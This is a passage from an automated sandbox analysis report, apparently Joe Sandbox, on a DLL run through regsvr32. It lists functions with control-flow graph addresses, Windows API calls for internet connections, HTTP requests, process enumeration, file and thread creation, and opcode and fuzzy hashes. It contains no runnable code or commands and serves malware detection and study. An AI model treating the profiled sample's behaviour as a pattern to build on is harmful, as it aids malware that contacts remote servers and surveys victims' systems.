                                control_flow_graph 703 180029710-180029777 call 1800153f4 706 18002977c-18002977e 703->706 707 180029784-180029789 706->707 708 180029a79-180029b31 call 180028300 706->708 709 18002978f-180029794 707->709 710 1800299b0-180029a6f call 180015408 707->710 715 180029b36 708->715 712 1800298d8-18002999d call 1800066c8 709->712 713 18002979a-18002979f 709->713 718 180029a74 Process32NextW 710->718 721 1800299a2-1800299a6 712->721 716 1800297a1-1800297a6 713->716 717 1800297d9-1800298bc call 18000b3b4 713->717 719 180029b3b-180029b40 715->719 722 1800297a8-1800297ad 716->722 723 1800297be-1800297d7 call 18000a248 716->723 728 1800298c1-1800298c8 717->728 718->708 719->706 724 180029b46-180029b5e 719->724 721->710 722->719 726 1800297b3-1800297bc 722->726 723->706 726->706 728->724 730 1800298ce-1800298d3 728->730 730->706
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $g$>6$nB
                                • API String ID: 0-1868063892
                                • Opcode ID: 8b852edfb9a28c8a6125e1cd608d8a75501181fe9d205967e4ddb9cdded4da80
                                • Instruction ID: 5ef365e91c1d80a07604eb41db5a1b86f6ebf61e3d7968a3749ade557fb4125b
                                • Opcode Fuzzy Hash: 8b852edfb9a28c8a6125e1cd608d8a75501181fe9d205967e4ddb9cdded4da80
                                • Instruction Fuzzy Hash: 7CB121705193849FC7A9CF68C58569EBBF0FB88744F906A1DF8868B260D7B4DA44CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800155E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 599 1800155e0-18001569d call 1800153f4 602 1800156a3-18001571f call 18001c224 599->602 603 180015725-180015765 InternetConnectW 599->603 602->603
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ConnectInternet
                                • String ID: /w?$pYi
                                • API String ID: 3050416762-3829454487
                                • Opcode ID: 33421f65957b2cee526031f8a07a804c17c2d95f214975574550df922f90e764
                                • Instruction ID: 9ccfc4099f9371cda73c12f66118d6bd88d16b35f011f4316eea9315b8229921
                                • Opcode Fuzzy Hash: 33421f65957b2cee526031f8a07a804c17c2d95f214975574550df922f90e764
                                • Instruction Fuzzy Hash: B741E57050C7888FD778DF28D08579AB7E0FB98355F504A2EE88DC7256DB749844CB46
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180008E80 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93networkCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HttpOpenRequest
                                • String ID: /w?
                                • API String ID: 1984915467-2883141396
                                • Opcode ID: 818aa95858f7ed11817eb131aa565176550a369bd62d65159787a93bff5cf428
                                • Instruction ID: 62644a68fcffc2b577fce7b544f847534cb1236eece225f9d3186d00a7134b33
                                • Opcode Fuzzy Hash: 818aa95858f7ed11817eb131aa565176550a369bd62d65159787a93bff5cf428
                                • Instruction Fuzzy Hash: 82414B7051CB848BDBA4DF18D08979AB7E0FB98315F10495EE48CC7296DB789888CB87
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002A3E0 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: InformationVolume
                                • String ID:
                                • API String ID: 2039140958-0
                                • Opcode ID: bf946f7280dffac1a3cb664117863ae64736b63a5e6a79a2235ba17386e3f57f
                                • Instruction ID: a7a4fb0533c75889cab630729e0b0d9f2a38dc76e554bad22bb68829b1652ebe
                                • Opcode Fuzzy Hash: bf946f7280dffac1a3cb664117863ae64736b63a5e6a79a2235ba17386e3f57f
                                • Instruction Fuzzy Hash: AB412C705187808FEB78DF18D48A79AB7E1FB98305F104A5DE88DC7396CB789844CB46
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180010B1C Relevance: 1.6, APIs: 1, Instructions: 96fileCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 36e83bb09eec7ec6f2f1980e7d227db28432cb7784451cfb87e32bb48f6cd236
                                • Instruction ID: ac55bdb39f8b4cda225445b8a297a6fe4d60e7d5d7af93594b9ed55c6b81ea6e
                                • Opcode Fuzzy Hash: 36e83bb09eec7ec6f2f1980e7d227db28432cb7784451cfb87e32bb48f6cd236
                                • Instruction Fuzzy Hash: B941047061C7848FC7A8DF18D08579AB7E0FB98304F10895EE88DC7256DB709988CB86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180025B1C Relevance: 1.6, APIs: 1, Instructions: 82threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 7af62da62a3dd359fefdd9c6a8904522cdd90ae6c0ef31e605b5c3566544960a
                                • Instruction ID: 3f2c7be81e2b52442973c9c793e7ddf499cdb82d70e50cd1cb8991bbce4e9b94
                                • Opcode Fuzzy Hash: 7af62da62a3dd359fefdd9c6a8904522cdd90ae6c0ef31e605b5c3566544960a
                                • Instruction Fuzzy Hash: 4F316970A1CB848FD768DF28D48A75AB7E0FB98304F100A1EF588C7252CB74D904CB86
                                Uniqueness

                                Uniqueness Score: -1.00%